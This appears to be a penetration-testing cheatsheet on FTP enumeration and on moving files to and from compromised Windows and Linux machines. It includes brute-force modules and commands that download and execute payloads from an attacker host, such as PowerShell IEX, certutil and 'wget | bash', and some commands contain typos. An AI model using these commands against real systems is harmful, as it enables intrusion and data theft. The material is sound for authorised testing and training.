Enumeration Cheatsheets

Enumerating FTP for Pentesting (Port 21)

Basic Enumeration

Attempt to connect anonymously by issuing the below command and specifying the following credentials; anonymous:anonymous.

ftp <ipAddress>

You can perform banner grabbing w/ the following Metasploit module.

use auxiliary/scanner/ftp/ftp_version

You can perform brute force with the following Metasploit module.

use auxiliary/scanner/ftp/ftp_login

Transferring Files

If you have valid credentials, you can use the following command to download all files recursively.

wget --mirror 'ftp://<username>:<password>@<ipAddress>

Tips & Tricks

Windows File Transfer Cheatsheet

Wanted to provide a single place to go for all file upload/download techniques when attacking a Windows machine from Kali Linux. This will be updated as I come across new ones and/or the next time I need to use them.

Uploading and Hosting Files

Python Web Server

The following will start a webserver in the present working directory using Python2.
python -m SimpleHTTP Server 80

The following will start a webserver in the present working directory using Python3.
python3 -m http.server 80

Impacket SMB Server

You can download Impacket from Github.

We’ll need to perform a few steps to set this up, but it’s a great way to transfer files to/from a system. To begin, let’s create a directory called smb on our attacking system. Files in this directory will be available on the other end, and likewise, the other end will be able to place files into this directory.
mkdir smb
impacket-smbserver <sharename> `<path>`

Then we can mount this file share in PowerShell from the other side.
New-PSDrive -Name "<ShareName>" -PSProvider "FileSystem" -Root "\\<attackerIP>\<ShareName>

And change into the new drive.
cd <ShareName>:

Additional Method With Authentication:

On our Kali machine, we’ll start our Impacket server while in the directory we wish to host.
sudo impacket-smbserver <shareName> $(pwd) -smb2support -user <user> -p <password>

Then on the Windows machine, we’ll connect back to this SMB share, but we’ll need to specify the credentials mentioned in the above command. To do that, we’ll use the following commands:

$pass = ConvertTo-SecureString '<password>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('<user>', $pass)
New-PSDrive -Name "<ShareName>" -PSProvider "FileSystem" -Root "\\<attackerIP>\<ShareName> -Credential $cred

Downloading Files


The following will download and store a remote file to disk.
Invoke-WebRequest -Uri "http://attackerIP/file.exe" -OutFile "C:\path\to\file.exe"

The following will download and automatically execute the remote PowerShell script when ran from a command prompt.
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://attackerIP/file.ps1')

An alternative to the above is to use Invoke-WebRequest in a different manner.
powershell.exe "IEX (IWR http://attackerIP/file.ps1 -UseBasicParsing)"


The following will download and store a remote file to disk.
certutil.exe -urlcache -f "http://attackerIP/file.exe" file.exe

Windows Defender

The following will download and store a remote file to disk.
MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]

Transferring with SSH

To copy a file from B to A while logged into B:
scp /path/to/file username@a:/path/to/destination

To copy a file from B to A while logged into A:
scp username@b:/path/to/file /path/to/destination

Transferring via Base64 Encoding

From within a PowerShell session, you may want to encode the file into Base64 format so you can just copy it down to your destination machine and decode it on the other side. This is handy for transferring small files.

Within PowerShell, you can encode a file by running:

$file-contents = Get-Content "filename.txt"
$file-encode = [System.Text.Encoding]::UTF8.GetBytes($file-contents)

Then, within Kali, you can decode it using the following:
echo -n <base64String> | base64 -d > filename.txt

This should create the file for you to interact with.

Tips & Tricks

File Transfer in Linux: Uploading & Executing in Memory

These example will show us uploading LinEnum.sh to a victim machine and executing the file straight into memory so that we write nothing to the hard-drive.

Method A: Using Netcat

On our attacking box, find the executable you wish to transfer and run the following command:

cat <filename> | nc -nvlp 9002

On the victim machine, change into the following directory so nothing will happen if you do write to disk.

cd /dev/shm

Then transfer and execute the file by connecting back to your netcat connection.

nc 9002 | bash

Method B: Using Wget

Host up the file using a Python web server from your Kali machine:
sudo python3 -m http.server

And then run the following command from the victim to download and execute straight into memory.
wget -O - <attackerIP>/<fileName> | bash

Tips & Tricks

Transferring Files via Base64

Depending on the size of the file, you may not want to go through the hassle of transferring it via Netcat, FTP, or some other file transfer method.

In some cases, you can convert a file to Base64 code, and then simply copy/paste the code between the machines.

We’ll do that here. There is a file named viewuser on our victim box we want to copy to our Kali attacking machine. I already have a SSH connection to the victim box. Let’s start by converting the file to Base64.

base64 -w0 /usr/bin/viewuser

Note: -w0 gets rid of line wrapping.

We’ll highlight the code and then Copy Selection.

With that in our clipboard, head over to your Kali machine and let’s create a file called viewuser.b64

gedit viewuser.b64

Paste the code and Save the file.

Now just run the following command to decode the contents and dump it into a new file.

base64 -d viewuser.b64 > viewuser

That’s it! You’ve successfully transferred the file between machines.